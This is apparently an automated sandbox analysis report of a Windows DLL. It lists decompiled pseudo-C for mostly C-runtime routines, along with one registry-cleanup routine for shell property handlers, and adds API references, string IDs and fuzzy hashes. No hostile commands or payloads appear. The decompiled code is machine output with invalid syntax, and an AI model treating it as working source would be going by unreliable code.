                                          • API String ID: 396321892-1357300599
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 49%
                                          			E10003310(intOrPtr _a4, intOrPtr _a8, wchar_t* _a12, void _a16) {
                                          				signed int _v8;
                                          				short _v10;
                                          				long _v1032;
                                          				intOrPtr _v1036;
                                          				void* __edi;
                                          				void* __esi;
                                          				signed int _t16;
                                          				int _t21;
                                          				void* _t24;
                                          				intOrPtr _t26;
                                          				signed short _t30;
                                          				void* _t31;
                                          				void* _t34;
                                          				intOrPtr _t35;
                                          				WCHAR* _t36;
                                          				signed short _t37;
                                          				signed int _t40;
                                          				void* _t44;
                                          
                                          				_t16 =  *0x10012158; // 0x8bc2c1c1
                                          				_v8 = _t16 ^ _t40;
                                          				_t35 = _a8;
                                          				_v1036 = _a4;
                                          				_t37 = 0;
                                          				_t21 = vswprintf( &_v1032, 0x1ff, _a12,  &_a16);
                                          				if(_t21 < 0) {
                                          					L4:
                                          					_t37 = 0x8007007a;
                                          					L5:
                                          					_v10 = 0;
                                          					L6:
                                          					if(_t37 >= 0) {
                                          						_t30 =  &_v1032;
                                          						__imp__RegDeleteTreeW(_t35, _t30);
                                          						_t37 = _t30;
                                          						if(_t37 > 0) {
                                          							_t37 = _t37 & 0x0000ffff | 0x80070000;
                                          						}
                                          					}
                                          					_t36 = _a12;
                                          					if(_t37 >= 0) {
                                          						_t26 = _v1036;
                                          						if( *((char*)(_t26 + 0x26a)) == 0) {
                                          							__imp__#154(_t36, L"Software\\Classes\\%s", 0x13);
                                          							if(_t26 == 0 || StrStrIW(_t36, L"PropertyHandlers") != 0 || StrStrIW(_t36, L"KindMap") != 0) {
                                          								 *((char*)(_v1036 + 0x26a)) = 1;
                                          							}
                                          						}
                                          					}
                                          					_t38 =  ==  ? 0 : _t37;
                                          					_t24 =  ==  ? 0 : _t37;
                                          					return E10003850(_t31, _v8 ^ _t40, _t34, _t36,  ==  ? 0 : _t37);
                                          				}
                                          				_t44 = _t21 - 0x1ff;
                                          				if(_t44 > 0) {
                                          					goto L4;
                                          				}
                                          				if(_t44 != 0) {
                                          					goto L6;
                                          				} else {
                                          					goto L5;
                                          				}
                                          			}


                                          APIs
                                          • vswprintf.LIBCMT ref: 10003346
                                            • Part of subcall function 10003F0B: __vsnwprintf_l.LIBCMT ref: 10003F1C
                                          • RegDeleteTreeW.ADVAPI32(80000002,?,?,?,80000016,80000002), ref: 10003374
                                          • StrCmpNICW.SHLWAPI(1000D260,Software\Classes\%s,00000013), ref: 100033A7
                                          • StrStrIW.SHLWAPI(1000D260,PropertyHandlers), ref: 100033B7
                                          • StrStrIW.SHLWAPI(1000D260,KindMap), ref: 100033C7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2097429023.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000007.00000002.2097424498.0000000010000000.00000002.00020000.sdmp
                                          • Associated: 00000007.00000002.2097438801.000000001000D000.00000002.00020000.sdmp
                                          • Associated: 00000007.00000002.2097445868.0000000010012000.00000004.00020000.sdmp
                                          • Associated: 00000007.00000002.2097450834.0000000010015000.00000002.00020000.sdmp
                                          Similarity
                                          • API ID: DeleteTree__vsnwprintf_lvswprintf
                                          • String ID: KindMap$PropertyHandlers$Software\Classes\%s
                                          • API String ID: 1945471109-984809517
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E1000CB53(void* __eflags, signed int _a4) {
                                          				void* _t12;
                                          				signed int _t13;
                                          				signed int _t16;
                                          				intOrPtr _t18;
                                          				void* _t22;
                                          				signed int _t35;
                                          				long _t40;
                                          
                                          				_t13 = E100076DE(_t12);
                                          				if(_t13 >= 0) {
                                          					_t35 = _a4;
                                          					if(E1000C21F(_t35) == 0xffffffff) {
                                          						L10:
                                          						_t40 = 0;
                                          					} else {
                                          						_t18 =  *0x10014c80;
                                          						if(_t35 != 1 || ( *(_t18 + 0x84) & 0x00000001) == 0) {
                                          							if(_t35 != 2 || ( *(_t18 + 0x44) & 0x00000001) == 0) {
                                          								goto L8;
                                          							} else {
                                          								goto L7;
                                          							}
                                          						} else {
                                          							L7:
                                          							_t22 = E1000C21F(2);
                                          							if(E1000C21F(1) == _t22) {
                                          								goto L10;
                                          							} else {
                                          								L8:
                                          								if(CloseHandle(E1000C21F(_t35)) != 0) {
                                          									goto L10;
                                          								} else {
                                          									_t40 = GetLastError();
                                          								}
                                          							}
                                          						}
                                          					}
                                          					E1000C199(_t35);
                                          					 *((char*)( *((intOrPtr*)(0x10014c80 + (_t35 >> 5) * 4)) + ((_t35 & 0x0000001f) << 6) + 4)) = 0;
                                          					if(_t40 == 0) {
                                          						_t16 = 0;
                                          					} else {
                                          						_t16 = E10005EA5(_t40) | 0xffffffff;
                                          					}
                                          					return _t16;
                                          				} else {
                                          					return _t13 | 0xffffffff;
                                          				}
                                          			}











                                          APIs
                                          • __ioinit.LIBCMT ref: 1000CB56
                                            • Part of subcall function 100076DE: InitOnceExecuteOnce.KERNEL32(10013300,10007719,00000000,00000000), ref: 100076EC
                                          • __get_osfhandle.LIBCMT ref: 1000CB6A
                                          • __get_osfhandle.LIBCMT ref: 1000CB95
                                          • __get_osfhandle.LIBCMT ref: 1000CB9E
                                          • __get_osfhandle.LIBCMT ref: 1000CBAA
                                          • CloseHandle.KERNEL32(00000000), ref: 1000CBB1
                                          • GetLastError.KERNEL32(?,1000CAFE,?,10010F70,00000010,1000C8AF,00000000,?,?,?), ref: 1000CBBB
                                          • __free_osfhnd.LIBCMT ref: 1000CBC8
                                          • __dosmaperr.LIBCMT ref: 1000CBEA
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2097429023.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000007.00000002.2097424498.0000000010000000.00000002.00020000.sdmp
                                          • Associated: 00000007.00000002.2097438801.000000001000D000.00000002.00020000.sdmp
                                          • Associated: 00000007.00000002.2097445868.0000000010012000.00000004.00020000.sdmp
                                          • Associated: 00000007.00000002.2097450834.0000000010015000.00000002.00020000.sdmp
                                          Similarity
                                          • API ID: __get_osfhandle$Once$CloseErrorExecuteHandleInitLast__dosmaperr__free_osfhnd__ioinit
                                          • String ID:
                                          • API String ID: 974577687-0
                                          • Opcode ID: 3cbe5b743ca391b3917be70e90bbbac28116ae9407cffcad9e6b9bd512ea96cf
                                          • Instruction ID: 4dcb91801efe7e8802ed07738d4b4d51631a97aa082ad4716e798bfbc08581c5
                                          • Opcode Fuzzy Hash: 3cbe5b743ca391b3917be70e90bbbac28116ae9407cffcad9e6b9bd512ea96cf
                                          • Instruction Fuzzy Hash: 6D112532A0136806F220D3B4AD86F6E3788CB81AF4F260259F92C9B1DAEF25E8424150
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • PSPropertyKeyFromString.PROPSYS(?,1000D358), ref: 10002AE7
                                          • VariantClear.OLEAUT32(?), ref: 10002B69
                                            • Part of subcall function 100021F0: CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,?,?), ref: 1000220D
                                            • Part of subcall function 100021F0: CoTaskMemAlloc.OLE32(?), ref: 10002227
                                            • Part of subcall function 100021F0: CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000001), ref: 10002250
                                            • Part of subcall function 100021F0: StgDeserializePropVariant.PROPSYS(00000000,?,00000000), ref: 10002271
                                            • Part of subcall function 100021F0: CoTaskMemFree.OLE32(00000000), ref: 1000227A
                                          • PropVariantClear.OLE32(?), ref: 10002B59
                                          • VariantClear.OLEAUT32(?), ref: 10002B63
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2097429023.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000007.00000002.2097424498.0000000010000000.00000002.00020000.sdmp
                                          • Associated: 00000007.00000002.2097438801.000000001000D000.00000002.00020000.sdmp
                                          • Associated: 00000007.00000002.2097445868.0000000010012000.00000004.00020000.sdmp
                                          • Associated: 00000007.00000002.2097450834.0000000010015000.00000002.00020000.sdmp
                                          Similarity
                                          • API ID: Variant$ClearString$BinaryCryptPropTask$AllocDeserializeFreeFromProperty
                                          • String ID: EncodedValue$Key$Recipe/ExtendedProperties/Property
                                          • API String ID: 3673094071-3396277477
                                          • Opcode ID: 34e6e79458104e6e1469201b0e61f5a36d41562487ec41c5afc00e26a826af91
                                          • Instruction ID: 3dad86e6d28e45b22825a59d90f277ab18ae42466b94d84f5f8411af20a881c7
                                          • Opcode Fuzzy Hash: 34e6e79458104e6e1469201b0e61f5a36d41562487ec41c5afc00e26a826af91
                                          • Instruction Fuzzy Hash: 1D510A71D0061A9FDB11DFE4C884ADEB7B9EF8D350B118259E905EB214EB35AD42CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 91%
                                          			E100061BA(void* __ebx, void* __edi) {
                                          				void* __esi;
                                          				void* _t3;
                                          				intOrPtr _t6;
                                          				long _t14;
                                          				long* _t27;
                                          
                                          				E1000750E(_t3);
                                          				if(E100092DA() != 0) {
                                          					_t6 = E10007E6B(_t5, E10005F1A);
                                          					 *0x10012310 = _t6;
                                          					__eflags = _t6 - 0xffffffff;
                                          					if(_t6 == 0xffffffff) {
                                          						goto L1;
                                          					} else {
                                          						_t27 = E10007F1D(1, 0x3b8);
                                          						__eflags = _t27;
                                          						if(_t27 == 0) {
                                          							L6:
                                          							E10006230();
                                          							__eflags = 0;
                                          							return 0;
                                          						} else {
                                          							__eflags = E10007E95(_t9,  *0x10012310, _t27);
                                          							if(__eflags == 0) {
                                          								goto L6;
                                          							} else {
                                          								_push(0);
                                          								_push(_t27);
                                          								E1000610E(__ebx, __edi, _t27, __eflags);
                                          								_t14 = GetCurrentThreadId();
                                          								_t27[1] = _t27[1] | 0xffffffff;
                                          								 *_t27 = _t14;
                                          								__eflags = 1;
                                          								return 1;
                                          							}
                                          						}
                                          					}
                                          				} else {
                                          					L1:
                                          					E10006230();
                                          					return 0;
                                          				}
                                          			}









                                          APIs
                                          • __init_pointers.LIBCMT ref: 100061BA
                                            • Part of subcall function 1000750E: EncodePointer.KERNEL32(00000000,00000001,100061BF,10004499,10010AC8,00000008,10004659,?,00000001,?,10010AE8,0000000C,100045F8,?,00000001,?), ref: 10007511
                                            • Part of subcall function 1000750E: __initp_misc_winsig.LIBCMT ref: 10007532
                                          • __mtinitlocks.LIBCMT ref: 100061BF
                                            • Part of subcall function 100092DA: InitializeCriticalSectionAndSpinCount.KERNEL32(10012AF0,00000FA0,?,00000001,100061C4,10004499,10010AC8,00000008,10004659,?,00000001,?,10010AE8,0000000C,100045F8,?), ref: 100092F8
                                          • __mtterm.LIBCMT ref: 100061C8
                                            • Part of subcall function 10006230: DeleteCriticalSection.KERNEL32(?,?,?,?,1000455E,10004544,10010AC8,00000008,10004659,?,00000001,?,10010AE8,0000000C,100045F8,?), ref: 100091F6
                                            • Part of subcall function 10006230: _free.LIBCMT ref: 100091FD
                                            • Part of subcall function 10006230: DeleteCriticalSection.KERNEL32(10012AF0,?,?,1000455E,10004544,10010AC8,00000008,10004659,?,00000001,?,10010AE8,0000000C,100045F8,?,00000001), ref: 1000921F
                                          • __calloc_crt.LIBCMT ref: 100061ED
                                          • __initptd.LIBCMT ref: 1000620F
                                          • GetCurrentThreadId.KERNEL32(10004499,10010AC8,00000008,10004659,?,00000001,?,10010AE8,0000000C,100045F8,?,00000001,?), ref: 10006216
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2097429023.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000007.00000002.2097424498.0000000010000000.00000002.00020000.sdmp
                                          • Associated: 00000007.00000002.2097438801.000000001000D000.00000002.00020000.sdmp
                                          • Associated: 00000007.00000002.2097445868.0000000010012000.00000004.00020000.sdmp
                                          • Associated: 00000007.00000002.2097450834.0000000010015000.00000002.00020000.sdmp
                                          Similarity
                                          • API ID: CriticalSection$Delete$CountCurrentEncodeInitializePointerSpinThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                          • String ID:
                                          • API String ID: 757573777-0
                                          • Opcode ID: 5b0ef59983beb97e0e7b79d5c5f53f442986d3a06fb4cb0b895d7c58edb84587
                                          • Instruction ID: e938656deda60742f1fefc21b0672a3c59c014a575f1141aa0bdfd656c9da876
                                          • Opcode Fuzzy Hash: 5b0ef59983beb97e0e7b79d5c5f53f442986d3a06fb4cb0b895d7c58edb84587
                                          • Instruction Fuzzy Hash: 3CF0BB76519B2229F654E7347C0369A3AC5DF097F1F300A26F464D50DDEF14E4518150
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 88%
                                          			E1000C468(void* __ecx, void* __eflags, signed short _a4, signed int* _a8) {
                                          				signed int _v8;
                                          				char _v12;
                                          				void* __ebx;
                                          				void* __edi;
                                          				void* __esi;
                                          				void* __ebp;
                                          				void* _t45;
                                          				signed int _t46;
                                          				signed int _t47;
                                          				signed int _t50;
                                          				signed int _t53;
                                          				signed int _t54;
                                          				signed int _t59;
                                          				void* _t64;
                                          				signed int _t66;
                                          				void* _t68;
                                          				signed int _t75;
                                          				signed int _t79;
                                          				signed short _t80;
                                          				signed int _t82;
                                          				void* _t83;
                                          				signed int _t90;
                                          				void* _t91;
                                          				signed int _t92;
                                          				signed int _t94;
                                          				signed int* _t97;
                                          
                                          				_t46 = E100076DE(_t45);
                                          				if(_t46 >= 0) {
                                          					_t97 = _a8;
                                          					_t47 = E100095F8(_t97);
                                          					_t79 = _t97[3];
                                          					_t94 = _t47;
                                          					__eflags = _t79 & 0x00000082;
                                          					if((_t79 & 0x00000082) != 0) {
                                          						__eflags = _t79 & 0x00000040;
                                          						if((_t79 & 0x00000040) == 0) {
                                          							_t75 = 0;
                                          							__eflags = _t79 & 0x00000001;
                                          							if((_t79 & 0x00000001) == 0) {
                                          								L10:
                                          								_t50 = _t97[3] & 0xffffffef | 0x00000002;
                                          								_t97[3] = _t50;
                                          								_t97[1] = _t75;
                                          								__eflags = _t50 & 0x0000010c;
                                          								if((_t50 & 0x0000010c) == 0) {
                                          									_t64 = E1000951C();
                                          									__eflags = _t97 - _t64 + 0x20;
                                          									if(_t97 == _t64 + 0x20) {
                                          										L13:
                                          										_t66 = E1000961C(_t94);
                                          										__eflags = _t66;
                                          										if(_t66 == 0) {
                                          											goto L14;
                                          										}
                                          									} else {
                                          										_t68 = E1000951C();
                                          										__eflags = _t97 - _t68 + 0x40;
                                          										if(_t97 != _t68 + 0x40) {
                                          											L14:
                                          											E1000A133(_t97);
                                          										} else {
                                          											goto L13;
                                          										}
                                          									}
                                          								}
                                          								__eflags = _t97[3] & 0x00000108;
                                          								if(__eflags == 0) {
                                          									_v12 = _a4;
                                          									_push(2);
                                          									_push( &_v12);
                                          									_push(_t94);
                                          									_v8 = 2;
                                          									_t53 = E10009680(_t75, _t91, _t94, _t97, __eflags);
                                          									_t80 = _a4;
                                          									_t75 = _t53;
                                          									goto L27;
                                          								} else {
                                          									_t92 = _t97[2];
                                          									 *_t97 = _t92 + 2;
                                          									_t82 =  *_t97 - _t92;
                                          									_v8 = _t82;
                                          									_t97[1] = _t97[6] - 2;
                                          									__eflags = _t82;
                                          									if(__eflags <= 0) {
                                          										__eflags = _t94 - 0xffffffff;
                                          										if(_t94 == 0xffffffff) {
                                          											L22:
                                          											_t83 = 0x10012340;
                                          										} else {
                                          											__eflags = _t94 - 0xfffffffe;
                                          											if(_t94 == 0xfffffffe) {
                                          												goto L22;
                                          											} else {
                                          												_t83 = ((_t94 & 0x0000001f) << 6) +  *((intOrPtr*)(0x10014c80 + (_t94 >> 5) * 4));
                                          											}
                                          										}
                                          										__eflags =  *(_t83 + 4) & 0x00000020;
                                          										if(__eflags == 0) {
                                          											goto L25;
                                          										} else {
                                          											_push(2);
                                          											_push(_t75);
                                          											_push(_t75);
                                          											_push(_t94);
                                          											_t59 = E10009FB9(_t75, _t94, _t97, __eflags);
                                          											__eflags = (_t59 & _t92) - 0xffffffff;
                                          											if((_t59 & _t92) == 0xffffffff) {
                                          												goto L28;
                                          											} else {
                                          												goto L25;
                                          											}
                                          										}
                                          									} else {
                                          										_push(_t82);
                                          										_push(_t92);
                                          										_push(_t94);
                                          										_t75 = E10009680(_t75, _t92, _t94, _t97, __eflags);
                                          										L25:
                                          										_t80 = _a4;
                                          										 *(_t97[2]) = _t80;
                                          										L27:
                                          										__eflags = _t75 - _v8;
                                          										if(_t75 == _v8) {
                                          											_t54 = _t80 & 0x0000ffff;
                                          										} else {
                                          											L28:
                                          											_t43 =  &(_t97[3]);
                                          											 *_t43 = _t97[3] | 0x00000020;
                                          											__eflags =  *_t43;
                                          											goto L29;
                                          										}
                                          									}
                                          								}
                                          							} else {
                                          								_t97[1] = 0;
                                          								__eflags = _t79 & 0x00000010;
                                          								if((_t79 & 0x00000010) == 0) {
                                          									_t97[3] = _t79 | 0x00000020;
                                          									L29:
                                          									_t54 = 0xffff;
                                          								} else {
                                          									_t90 = _t79 & 0xfffffffe;
                                          									__eflags = _t90;
                                          									 *_t97 = _t97[2];
                                          									_t97[3] = _t90;
                                          									goto L10;
                                          								}
                                          							}
                                          						} else {
                                          							 *((intOrPtr*)(E10005EC6())) = 0x22;
                                          							goto L6;
                                          						}
                                          					} else {
                                          						 *((intOrPtr*)(E10005EC6())) = 9;
                                          						L6:
                                          						_t97[3] = _t97[3] | 0x00000020;
                                          						_t54 = 0xffff;
                                          					}
                                          					return _t54;
                                          				} else {
                                          					return _t46 | 0xffffffff;
                                          				}
                                          			}





























                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x1000c590
                                          0x1000c53c
                                          0x1000c53c
                                          0x1000c53d
                                          0x1000c53e
                                          0x1000c547
                                          0x1000c592
                                          0x1000c595
                                          0x1000c598
                                          0x1000c5bf
                                          0x1000c5bf
                                          0x1000c5c2
                                          0x1000c5cf
                                          0x1000c5c4
                                          0x1000c5c4
                                          0x1000c5c4
                                          0x1000c5c4
                                          0x1000c5c4
                                          0x00000000
                                          0x1000c5c4
                                          0x1000c5c2
                                          0x1000c53a
                                          0x1000c4c4
                                          0x1000c4c4
                                          0x1000c4c7
                                          0x1000c4ca
                                          0x1000c54e
                                          0x1000c5c8
                                          0x1000c5c8
                                          0x1000c4cc
                                          0x1000c4cf
                                          0x1000c4cf
                                          0x1000c4d2
                                          0x1000c4d4
                                          0x00000000
                                          0x1000c4d4
                                          0x1000c4ca
                                          0x1000c4a3
                                          0x1000c4a8
                                          0x00000000
                                          0x1000c4a8
                                          0x1000c491
                                          0x1000c496
                                          0x1000c4ae
                                          0x1000c4ae
                                          0x1000c4b2
                                          0x1000c4b2
                                          0x1000c5d6
                                          0x1000c476
                                          0x1000c47a
                                          0x1000c47a

                                          APIs
                                          • __ioinit.LIBCMT ref: 1000C46D
                                            • Part of subcall function 100076DE: InitOnceExecuteOnce.KERNEL32(10013300,10007719,00000000,00000000), ref: 100076EC
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2097429023.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000007.00000002.2097424498.0000000010000000.00000002.00020000.sdmp
                                          • Associated: 00000007.00000002.2097438801.000000001000D000.00000002.00020000.sdmp
                                          • Associated: 00000007.00000002.2097445868.0000000010012000.00000004.00020000.sdmp
                                          • Associated: 00000007.00000002.2097450834.0000000010015000.00000002.00020000.sdmp
                                          Similarity
                                          • API ID: Once$ExecuteInit__ioinit
                                          • String ID:
                                          • API String ID: 129814473-0
                                          • Opcode ID: ce445c66c181a3168f9633bae39411e21304db9b0211bfbf8d544381d7ae233e
                                          • Instruction ID: 4d06972f43a844bfa3949195b83d417bb95582cf177f034ad1b947d460bfdcb6
                                          • Opcode Fuzzy Hash: ce445c66c181a3168f9633bae39411e21304db9b0211bfbf8d544381d7ae233e
                                          • Instruction Fuzzy Hash: B641E175500B099BF724CB68CC91E6A77E4EF453E1F10861DE8A6876D9E774FD808B10
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 89%
                                          			E10005033(void* __eflags, signed char _a4, intOrPtr* _a8) {
                                          				signed int _v8;
                                          				void* __ebx;
                                          				void* __edi;
                                          				void* __esi;
                                          				void* __ebp;
                                          				void* _t43;
                                          				signed int _t44;
                                          				signed int _t45;
                                          				signed int _t48;
                                          				signed int _t52;
                                          				void* _t60;
                                          				signed int _t62;
                                          				void* _t64;
                                          				signed int _t67;
                                          				signed int _t70;
                                          				signed int _t74;
                                          				signed int _t76;
                                          				void* _t77;
                                          				signed int _t85;
                                          				void* _t86;
                                          				signed int _t87;
                                          				signed int _t89;
                                          				intOrPtr* _t92;
                                          
                                          				_t44 = E100076DE(_t43);
                                          				if(_t44 >= 0) {
                                          					_t92 = _a8;
                                          					_t45 = E100095F8(_t92);
                                          					_t2 = _t92 + 0xc; // 0x66ce7cf0
                                          					_t74 =  *_t2;
                                          					_t89 = _t45;
                                          					__eflags = _t74 & 0x00000082;
                                          					if((_t74 & 0x00000082) != 0) {
                                          						__eflags = _t74 & 0x00000040;
                                          						if((_t74 & 0x00000040) == 0) {
                                          							_t70 = 0;
                                          							__eflags = _t74 & 0x00000001;
                                          							if((_t74 & 0x00000001) == 0) {
                                          								L10:
                                          								_t16 = _t92 + 0xc; // 0x66ce7cf0
                                          								_t48 =  *_t16 & 0xffffffef | 0x00000002;
                                          								 *(_t92 + 0xc) = _t48;
                                          								 *(_t92 + 4) = _t70;
                                          								__eflags = _t48 & 0x0000010c;
                                          								if((_t48 & 0x0000010c) == 0) {
                                          									_t60 = E1000951C();
                                          									__eflags = _t92 - _t60 + 0x20;
                                          									if(_t92 == _t60 + 0x20) {
                                          										L13:
                                          										_t62 = E1000961C(_t89);
                                          										__eflags = _t62;
                                          										if(_t62 == 0) {
                                          											goto L14;
                                          										}
                                          									} else {
                                          										_t64 = E1000951C();
                                          										__eflags = _t92 - _t64 + 0x40;
                                          										if(_t92 != _t64 + 0x40) {
                                          											L14:
                                          											E1000A133(_t92);
                                          										} else {
                                          											goto L13;
                                          										}
                                          									}
                                          								}
                                          								__eflags =  *(_t92 + 0xc) & 0x00000108;
                                          								if(( *(_t92 + 0xc) & 0x00000108) == 0) {
                                          									__eflags = 1;
                                          									_push(1);
                                          									_v8 = 1;
                                          									_push( &_a4);
                                          									_push(_t89);
                                          									_t45 = E10009680(_t70, _t86, _t89, _t92, 1);
                                          									_t70 = _t45;
                                          									goto L27;
                                          								} else {
                                          									_t24 = _t92 + 8; // 0x753b46c6
                                          									_t87 =  *_t24;
                                          									_t25 = _t87 + 1; // 0x753b46c7
                                          									 *_t92 = _t25;
                                          									_t26 = _t92 + 0x18; // 0x8b0d78fe
                                          									_t76 =  *_t92 - _t87;
                                          									_v8 = _t76;
                                          									 *(_t92 + 4) =  *_t26 - 1;
                                          									__eflags = _t76;
                                          									if(__eflags <= 0) {
                                          										__eflags = _t89 - 0xffffffff;
                                          										if(_t89 == 0xffffffff) {
                                          											L22:
                                          											_t77 = 0x10012340;
                                          										} else {
                                          											__eflags = _t89 - 0xfffffffe;
                                          											if(_t89 == 0xfffffffe) {
                                          												goto L22;
                                          											} else {
                                          												_t77 = ((_t89 & 0x0000001f) << 6) +  *((intOrPtr*)(0x10014c80 + (_t89 >> 5) * 4));
                                          											}
                                          										}
                                          										__eflags =  *(_t77 + 4) & 0x00000020;
                                          										if(__eflags == 0) {
                                          											goto L25;
                                          										} else {
                                          											_push(2);
                                          											_push(_t70);
                                          											_push(_t70);
                                          											_push(_t89);
                                          											_t45 = E10009FB9(_t70, _t89, _t92, __eflags) & _t87;
                                          											__eflags = _t45 - 0xffffffff;
                                          											if(_t45 == 0xffffffff) {
                                          												goto L28;
                                          											} else {
                                          												goto L25;
                                          											}
                                          										}
                                          									} else {
                                          										_push(_t76);
                                          										_push(_t87);
                                          										_push(_t89);
                                          										_t70 = E10009680(_t70, _t87, _t89, _t92, __eflags);
                                          										L25:
                                          										_t35 = _t92 + 8; // 0x753b46c6
                                          										_t45 = _a4;
                                          										 *( *_t35) = _t45;
                                          										L27:
                                          										__eflags = _t70 - _v8;
                                          										if(_t70 == _v8) {
                                          											_t52 = _a4 & 0x000000ff;
                                          										} else {
                                          											L28:
                                          											_t40 = _t92 + 0xc;
                                          											 *_t40 =  *(_t92 + 0xc) | 0x00000020;
                                          											__eflags =  *_t40;
                                          											goto L29;
                                          										}
                                          									}
                                          								}
                                          							} else {
                                          								 *(_t92 + 4) = 0;
                                          								__eflags = _t74 & 0x00000010;
                                          								if((_t74 & 0x00000010) == 0) {
                                          									 *(_t92 + 0xc) = _t74 | 0x00000020;
                                          									L29:
                                          									_t52 = _t45 | 0xffffffff;
                                          								} else {
                                          									_t14 = _t92 + 8; // 0x753b46c6
                                          									_t85 = _t74 & 0xfffffffe;
                                          									__eflags = _t85;
                                          									 *_t92 =  *_t14;
                                          									 *(_t92 + 0xc) = _t85;
                                          									goto L10;
                                          								}
                                          							}
                                          						} else {
                                          							_t67 = E10005EC6();
                                          							 *_t67 = 0x22;
                                          							goto L6;
                                          						}
                                          					} else {
                                          						_t67 = E10005EC6();
                                          						 *_t67 = 9;
                                          						L6:
                                          						 *(_t92 + 0xc) =  *(_t92 + 0xc) | 0x00000020;
                                          						_t52 = _t67 | 0xffffffff;
                                          					}
                                          					return _t52;
                                          				} else {
                                          					return _t44 | 0xffffffff;
                                          				}
                                          			}



























                                          APIs
                                          • __ioinit.LIBCMT ref: 10005037
                                            • Part of subcall function 100076DE: InitOnceExecuteOnce.KERNEL32(10013300,10007719,00000000,00000000), ref: 100076EC
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2097429023.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000007.00000002.2097424498.0000000010000000.00000002.00020000.sdmp
                                          • Associated: 00000007.00000002.2097438801.000000001000D000.00000002.00020000.sdmp
                                          • Associated: 00000007.00000002.2097445868.0000000010012000.00000004.00020000.sdmp
                                          • Associated: 00000007.00000002.2097450834.0000000010015000.00000002.00020000.sdmp
                                          Similarity
                                          • API ID: Once$ExecuteInit__ioinit
                                          • String ID:
                                          • API String ID: 129814473-0
                                          • Opcode ID: 094f6d4174cdee5f7286b7252394e54f5dc20bac084be214e94df9e6538c1141
                                          • Instruction ID: 32086827ce60b9a2cbb99d25a0e80922b058c4e771a23cab2cd98d30bef894a1
                                          • Opcode Fuzzy Hash: 094f6d4174cdee5f7286b7252394e54f5dc20bac084be214e94df9e6538c1141
                                          • Instruction Fuzzy Hash: 4A41F171900B059FF324CF68C851BAB77E4DF453E2B10871DE8B6C62D9E676E9408B50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 90%
                                          			E10004A66(void* __ebx, void* __edx, void* __edi, void* __eflags, intOrPtr _a4) {
                                          				char* _v16;
                                          				char _v28;
                                          				signed char _v32;
                                          				void* _t10;
                                          				void* _t19;
                                          				intOrPtr* _t22;
                                          				void* _t24;
                                          				void* _t25;
                                          				intOrPtr* _t27;
                                          
                                          				_t25 = __edi;
                                          				_t24 = __edx;
                                          				_t19 = __ebx;
                                          				while(1) {
                                          					_t10 = E10008E67(_t19, _t24, _t25, _a4);
                                          					if(_t10 != 0) {
                                          						break;
                                          					}
                                          					if(E10009026(_t10, _a4) == 0) {
                                          						_push(1);
                                          						_t22 =  &_v28;
                                          						_v16 = "bad allocation";
                                          						E10008F1E(_t22,  &_v16);
                                          						_v28 = 0x1000e460;
                                          						E10009059( &_v28, 0x10010b04);
                                          						asm("int3");
                                          						_t27 = _t22;
                                          						 *_t27 = 0x1000e460;
                                          						E10008F5C(_t22);
                                          						if((_v32 & 0x00000001) != 0) {
                                          							L10003800(_t27);
                                          						}
                                          						return _t27;
                                          					} else {
                                          						continue;
                                          					}
                                          					L7:
                                          				}
                                          				return _t10;
                                          				goto L7;
                                          			}













                                          APIs
                                          • _malloc.LIBCMT ref: 10004A7E
                                            • Part of subcall function 10008E67: __FF_MSGBANNER.LIBCMT ref: 10008E7E
                                            • Part of subcall function 10008E67: __NMSG_WRITE.LIBCMT ref: 10008E85
                                            • Part of subcall function 10008E67: HeapAlloc.KERNEL32(001F0000,00000000,00000001,00000000,?,00000000,?,10007F7D,1000E4A0,1000E4A0,1000E4A0,?,?,10009274,00000018,10010E08), ref: 10008EAA
                                          • std::exception::exception.LIBCMT ref: 10004A9A
                                          • __CxxThrowException@8.LIBCMT ref: 10004AAF
                                            • Part of subcall function 10009059: RaiseException.KERNEL32(?,?,?,10010B04,?,?,?,10004AB4,?,10010B04,00000000,00000001), ref: 100090AA
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2097429023.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000007.00000002.2097424498.0000000010000000.00000002.00020000.sdmp
                                          • Associated: 00000007.00000002.2097438801.000000001000D000.00000002.00020000.sdmp
                                          • Associated: 00000007.00000002.2097445868.0000000010012000.00000004.00020000.sdmp
                                          • Associated: 00000007.00000002.2097450834.0000000010015000.00000002.00020000.sdmp
                                          Similarity
                                          • API ID: AllocExceptionException@8HeapRaiseThrow_mallocstd::exception::exception
                                          • String ID: `$h
                                          • API String ID: 1059622496-773005782
                                          • Opcode ID: 8198483a73eec0a2752513ca626908b84cd43bbea8819fe80895fe02013f144e
                                          • Instruction ID: ad3e8221741d280e2df0066782729e531edcb1fd3c4a4238d597797a5e5b62a6
                                          • Opcode Fuzzy Hash: 8198483a73eec0a2752513ca626908b84cd43bbea8819fe80895fe02013f144e
